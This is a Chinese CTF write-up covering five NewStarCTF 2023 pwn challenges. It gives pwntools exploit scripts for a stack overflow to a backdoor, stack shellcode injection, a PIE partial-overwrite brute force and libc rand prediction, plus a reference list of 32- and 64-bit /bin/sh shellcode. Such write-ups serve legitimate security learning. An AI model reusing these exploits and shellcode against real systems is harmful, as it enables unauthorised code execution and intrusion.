NewStarCTF 2023 [WEEK 1] PWN

简介:

祝大家国庆节快乐,国庆就别再打CTF了,别卷了师傅们,玩玩吧!!!

第一周的题目相对比较容易,pwn没有ak有点可惜,伪随机的部分弄得还不是很清楚,需要加把油


ret2text

一看题目就知道是经典栈溢出,老规矩查看保护机制,打开了栈不可执行NX

NewStarCTF 2023 [WEEK 1] PWN_第1张图片

ida查看反汇编,栈溢出很明显,并且还自带后门函数

NewStarCTF 2023 [WEEK 1] PWN_第2张图片

NewStarCTF 2023 [WEEK 1] PWN_第3张图片

最后再查看一下需要溢出多少字节的垃圾数据(一般情况下需要溢出的垃圾数据可以在ida里面找到),gdb调试一下,0x80 - 0x60= 0x20

直接攻击就行,exp如下:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./pwn')
p = remote('node4.buuoj.cn',26188)
elf = ELF('./111')

backdoor =0x4011FB
payload =b'A'*(0X20 +8) +p64(backdoor)

p.sendline(payload)
p.interactive()

ezshellcode

也是比较经典的shellcode,开启NX,往栈上写shellcode即可(但是需要注意的点就是shellcode的长度,根据题目来确定)

NewStarCTF 2023 [WEEK 1] PWN_第4张图片

ida反汇编也比较明显,就是往buf里面写入shellcode

NewStarCTF 2023 [WEEK 1] PWN_第5张图片

exp如下:

from pwn import *
from LibcSearcher import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./pwn')
p = remote('node4.buuoj.cn',29928)
elf = ELF('./111')

payload = b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05'

p.sendline(payload)
p.interactive()

相关的shellcode如下,可以了解下!!!

# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80

# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA

# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh

# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05

# 64位 较短的shellcode  23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05

# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t

newstar shop

这道题就是一道整形溢出,需要认真的代码审计,当时做的的时候有点傻逼,脑子没有转过来一直在想dont_try一次只能一次扣50,这样不可能使money达不到负数,忘记可以买东西了我真啥

先看下shop(),很明显自己的目的就是使直接赚够钱可以买到shell,从而达到cat flag的目的

NewStarCTF 2023 [WEEK 1] PWN_第6张图片

money属于无符号整型,这里就要想办法溢出才能有足够的钱买shell,如果单靠自己打工赚钱的话根本不可能,题目还设置了自己一天的工作时间,所以只有自己想办法溢出才是唯一的出路

NewStarCTF 2023 [WEEK 1] PWN_第7张图片

题目还给参数设置了一些初始值,现在的任务就是使money变成负数就可以达到整型溢出

NewStarCTF 2023 [WEEK 1] PWN_第8张图片

思路如下:(直接nc连接,然后就是先买两次商品,最后dont_try扣一次钱,就能达到溢出的目的,再去买shell,就可以直接拿下)


p1eee

查看保护机制,开启了PIE地址随机化,每次运行的基址都不一样,但是PIE不会随机化地址的低12位(也就是说后三位地址是固定的),所以可以采用partial write,爆破倒数第四位十六分之一的成功几率

NewStarCTF 2023 [WEEK 1] PWN_第9张图片

ida反编译,存在栈溢出,并且有后门函数(因为开启了pie,地址的后三位不会变 26c ,所以只需爆破倒数第四位)由于小端序的原因,所以就是'\x6c\x11',后面 \x11 是随机的,可以改成别的,如下都行

list =["\x01","\x11","\x21","\x31","\x41","\x51","\x61","\x71","\x81","\x91","\xa1", "\xb1","\xc1","\xd1","\xe1","\xf1"]

但是需要转换(都是套路)

NewStarCTF 2023 [WEEK 1] PWN_第10张图片

NewStarCTF 2023 [WEEK 1] PWN_第11张图片

NewStarCTF 2023 [WEEK 1] PWN_第12张图片

接下来就是写脚本爆破了(脚本格式通用),exp如下:

from pwn import *
context(os='linux', arch='amd64', log_level='debug')

while(1):
	try:
		#p = process('./111')
		p = remote('node4.buuoj.cn',28968)
		elf = ELF('./111')
 		
		payload =b'A'*(0X20 +8) +p16(0x126c)
		
		p.sendline(payload)
		p.interactive()
	except:
	    	p.close()

Random

from pwn import *
from ctypes import *
context(os='linux', arch='amd64', log_level='debug')

#p = process('./111')
p = remote('node4.buuoj.cn',26977)
elf = ELF('./111')
libc=cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")

seed=libc.time(0)
libc.srand(seed)
num1=libc.rand()

p.sendline(str(num1))
p.interactive()

总结:

伪随机部分还相对薄弱,需要加把油,绕过pie掌握的差不多了,加油,奥里给!!!

你可能感兴趣的:(PWN,网络安全,安全)